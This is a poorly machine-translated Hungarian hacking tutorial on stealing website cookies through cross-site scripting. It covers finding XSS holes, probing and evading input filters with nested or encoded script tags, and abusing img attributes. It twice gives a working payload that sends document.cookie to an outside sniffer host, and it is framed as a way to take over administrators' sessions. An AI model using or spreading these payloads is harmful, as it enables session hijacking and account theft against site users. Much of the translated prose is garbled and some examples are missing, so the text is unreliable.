Lopás cookie xss
XSS a CSS =) Cross Site Scripting
Nem tévesztendő össze a CSS is nevezik XSS
Mi az a süti, és miért XSS?
Cookie - egy egyszerű szöveges fájlt a kliens gépen, és tárolására használatos információs szerver.
Például, miután regisztrál és bejelentkezik a fórum, a webhely ment a cookie információkat rólad. Ott általában információ tárolására
A felhasználói név és jelszó. Később fórum beolvassa az adatokat, és meghatározza Önnek. Egy másik példa: te vagy a webhely rendszergazdája, és én
egyszerű felhasználó. De ha tudom megváltoztatni az adatokat a saját, én is meghatározza a rendszer, mint egy rendszergazda. Ezért
képesnek kell lennie arra, hogy lopni ugyanezeket cookie-t.
Mi XSS-támadás?
XSS támadások - egy támadás nem a helyszínen, hanem a felhasználók az oldalon.
XSS - ez a hiba a szűrő alkalmazása.
Vannak passzív és aktív XSS XSS.
Passzív - ez XSS, amely megköveteli a közvetlen bevonása az áldozatok sajátos +
korlátozások és a komplexitás. Ezért a passzív XSS nem nagyra értékelik. Például, meg kell rávenni, hogy menjen egy mérgező kapcsolat
Active - az XSS, amelyek nem igényelnek semmilyen további intézkedés része az áldozat - ez elég
Csak nyissa meg az oldalt az Ön XSS és a Java kód automatikusan végrehajtásra. Köszönhetően a automatizálás -, hogy nagyon hasznos és értékes.
Például az aktív CSU léteznek BB-tag, mert nincs elegendő szűrést, ha üzenetet hagy a forumegostevuhechate,
amely mindig aktív minden frissítés.
Hogyan talál XSS ezen az oldalon?
Megpróbálom beszúrni, ahol lehetséges a helyszínen tag (script) alert () (/ script). Ha a bal oldali üzenet,
majd töltse be a forgatókönyvet, és megtalálta XSS.
Vegyünk egy másik XSS „) (script) alert () (/ script) Mi történik ugyanabban az időben :. Mi
A záró címke „) (esetleg néhány változó határozza meg a szövegben, hogy bemutatjuk a formába), és elvégeztük
Hogyan állapítható meg, ha a szűrő?
Ehhez minden beviteli mezők „-!” (Basszus) =
Ezután nyissa meg az oldalt, és keresse meg a szót fasz, valamint más karaktereket:
Ha () balra, ez az első jele a biztonsági rést. Ha vannak karakter „”. Ez a második jel
Ha nem találja (), akkor valószínű, hogy ettek szűrőt. Nos, ha ezek helyére más karakter, akkor sajnos,
Szűrés jól működik.
Mi van, ha a szűrő fecskék ().
Azt próbálja beilleszteni (kdgfjdgfd), nézd lenyelve - majd helyezze be a csatát forgatókönyvet.
Arra is van esély, hogy fektessenek a script: (sc (script) RIPT) alert () (/ sc (/ script) RIPT). Ez segít, ha
A szűrő nem túl erős.
Előfordul, hogy a szűrő számát mutatja nyitott és zárt címkék és bezárja magát, akkor ez segít:
Gyakran előfordul, hogy a szűrő befejezi a forgatókönyvet, például így:
Meg lehet próbálni, hogy különböző kódolási és próbál kódolni egy forgatókönyvet.
Meg kell próbálnunk próbálgatással.
Meg kell próbálnunk, hogy adja meg a különböző értékek, nézd mi van a szűrő. tykov eljárás megérteni, hogy a szűrő működik,
mi a hiba. Ha a rossz szűrő, akkor mindig lehet szúrni a forgatókönyvet.
Például csak engedélyezett címkék használhatók az oldalon, akkor elrejti a hátuk mögött kell futtatni a szkriptet. Például ezt a címkét
img, url. A lényeg az, hogy meg kell beszúrni kérésünket beállítás img vagy url. Img Van egy csomó lehetőség
kivéve alt és az src, amelyeket fel lehet használni a vendégkönyvben és a fórumok.
Tekintsük az aktív XSS
talált XSS és aktív helyett alert (), akkor be a script
Ha a szűrő nem mondtak le, hogy próbálja meg ezt:
Ezen az oldalon a kanyar ezt a címkét:
Tény, hogy a figyelmeztető jelzés () nem fog semmit hasznos (ez csak akkor szükséges, hogy ellenőrizze). De a szkript maga:
Ő már lopás a cookie-kat
Helyettesítheti azt:
ahol „) (script) img = new Image (); img.src = "http://antichat.ru/cgi-bin/s.jpg?" + document.cookie; a script
2) biztonságosabb script, például:
már van egy fellebbezést My.js tartalmazó fájl
(Script) img = new Image (); img.src = "http://antichat.ru/cgi-bin/s.jpg?" + document.cookie;
Így biztonságosabb.
Néha, amikor meg kell titkosítani. Itt például:
Majd hívja a fájlt, például 1.jpg és a telephelyen. A reakció a következő:
Ekkor már célvonallal
a dokumentum kezelő a szippantás, hogy küldje el a cookie-t.
By the way, szemben a folyamat része, ez a kép nem jelenik meg
a kereszt alakban, mint van egy rejtett attribútum (style = display: none), és ha a 1x1 méretű. Miután megkapta a cookie nélkülünk
Választható: ha megyünk át az IE, a script működni fog, és ha az Opera, a script nem működik, és keresztezik. És ha átnevezi a html, akkor az opera működik is.